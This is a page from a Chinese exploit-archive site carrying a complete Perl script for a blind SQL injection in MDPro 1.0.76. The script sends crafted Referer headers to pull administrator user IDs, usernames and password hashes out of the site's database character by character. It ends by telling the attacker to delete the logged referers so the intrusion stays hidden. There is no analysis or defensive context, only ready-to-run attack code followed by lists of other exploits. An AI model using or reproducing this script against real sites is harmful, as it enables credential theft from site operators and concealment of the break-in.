首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MDPro 1.0.76 Remote SQL Injection Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2007-09-30  
#!/usr/bin/perl

use strict;
use IO::Socket;

my $app = "MDPro 1.0.76";
my $type = "SQL Injection";
my $author = "undefined1_";
my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0";

$| = 1;
print ":: $app $type - by $author ::\n\n\n";

my $url = shift || usage();

if($url =~ m/^(?:http:\/\/)(.*)/) {
$url = $1;
}
if($url !~ m/^.*\/$/) {
$url .= "/";
}

get_md5s($url);
print "don't forget to delete the referers from the admin interface...\n";

sub get_md5s {
my $url = shift;
$url .= "index.php";
my $admins_only = shift;
my $ps = 0;
my $referer = "Firefox ID=". randstring(20,25);

my $uid_charset = "1234567890";
my $user_charset = "abcdefghijklmnopqrstuvwxyz-_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ][}{+=/\\'\"\@\$#!%^&*()";
my $pass_charset = "afc0123456789abde";

my $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
my $recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: '\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;
if($recv !~ m/Call to undefined function PN_DBMsgError/m) {
print "magic quotes = on ;-[\n";
return $ps;
}

my $recv;
my $lastuid = 0;
while(1) {
my $uid_length = length("$lastuid");
my $user_length = 1;
my $pass_length = 32;
my $uid = "";
my $user = "";
my $pass = "";
my $O_RLY = 0;

for(my $x = $uid_length; $x <= 8; $x++) {
print "\ruid length = $uid_length";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_group_membership where length(CONCAT(pn_uid))=$x and pn_uid>$lastuid and pn_gid=2 limit 1 order by pn_uid asc)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$uid_length = $x;
$x = 9;
$O_RLY = 1;
}
}

if($O_RLY == 0) { return $ps; }
$O_RLY = 0;

print "\ruid length = $uid_length\n";

for(my $i = 1; $i <= $uid_length; $i++) {
for(my $j = 0; $j < length($uid_charset); $j++) {
my $key = substr($uid_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\ruid = $uid$key";

$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_group_membership where substring(pn_uid,$i,1)=$hex_key and pn_uid>$lastuid and pn_gid=2 order by pn_uid asc limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$uid .= $key;
$j = length($uid_charset);
}
}
}

print "\ruid = $uid\n";

for(my $x = $user_length; $x <= 25; $x++) {
print "\ruser length = $x";
$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where length(pn_uname)=$x and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$user_length = $x;
$x = 26;
$O_RLY = 1;
}
}

if($O_RLY == 0) { return $ps; }
$O_RLY = 0;

print "\ruser length = $user_length\n";

for(my $i = 1; $i <= $user_length; $i++) {
for(my $j = 0; $j < length($user_charset); $j++) {
my $key = substr($user_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\ruser = $user$key";

$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where substring(pn_uname,$i,1)=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$user .= $key;
$j = length($user_charset);
}
}
}

print "\ruser = $user\n";




# pour le pass, faire genre un tolower du char direct dans la sql query

for(my $i = 1; $i <= $pass_length; $i++) {
for(my $j = 0; $j < length($pass_charset); $j++) {
my $key = substr($pass_charset, $j, 1);
my $hex_key = sprintf("0x%02x", ord($key));
print "\rpassword = $pass$key";

$data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
$data .= "Host: " . parse_host($url) . "\r\n";
$data .= "Referer: $referer' and (select 1 from md_users where lower(substring(pn_pass,$i,1))=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
$data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$data .= "Connection: close\r\n\r\n";
$recv = sendpacket(parse_host($url), parse_port($url), $data);
$ps++;

if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
$pass .= $key;
$j = length($pass_charset);
}
}
}

print "\rpassword = $pass\n\n";


exit;
}
}

# ======================================================

sub parse_host {
my $url = shift;
if($url =~ m/^([^\/:]+).*\//) {
return $1;
}
return "127.0.0.1";
}

sub parse_port {
my $url = shift;
if($url =~ m/^(?:[^\/:]+):(\d+)\//) {
return $1;
}
return "80";
}

sub parse_page {
my $url = shift;
if($url =~ m/^(?:[^\/]+)(\/.*)/) {
return $1;
}
return "/";
}

sub randstring(\$,\$) {
my $min = shift;
my $max = shift;

my $length = int( (rand(65535)%($max-$min+1))+$min);
my $ret = "";
for(my $i = 0; $i < $length; $i++)
{
my $w = int(rand(3));
if($w == 0)
{
$ret .= chr(97 + int(rand(26)));
}
elsif($w == 1)
{
$ret .= chr(65 + int(rand(26)));
}
else
{
$ret .= chr(48 + int(rand(10)));
}
}

return $ret;
}

sub sendpacket {
my $server = shift;
my $port = shift;
my $data = shift;

my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
print $sock "$data";

$data = "";
my $resp;
while($resp = <$sock>) { $data .= $resp; }

close($sock);
return $data;
}

sub usage() {
printf "usage: %s <url>\n", $0;
exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tor < 0.1.2.16 ControlPort Rem
·ELSE IF CMS 0.6 Multiple Remot
·Zomplog <= 3.8.1 upload_files.
·CMS Creamotion (securite.php)
·Linux Kernel 2.4/2.6 x86-64 Sy
·wzdftpd <= 0.8.0 (USER) Remote
·PHP Homepage M 1.0 galerie.php
·Motorola Timbuktu Pro 8.6.3 Ar
·LightBlog 8.4.1.1 Remote Code
·EB Design Pty Ltd (EBCRYPT.DLL
·Microsoft Visual FoxPro 6.0 FP
·AskJeeves Toolbar 4.0.2.53 act
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved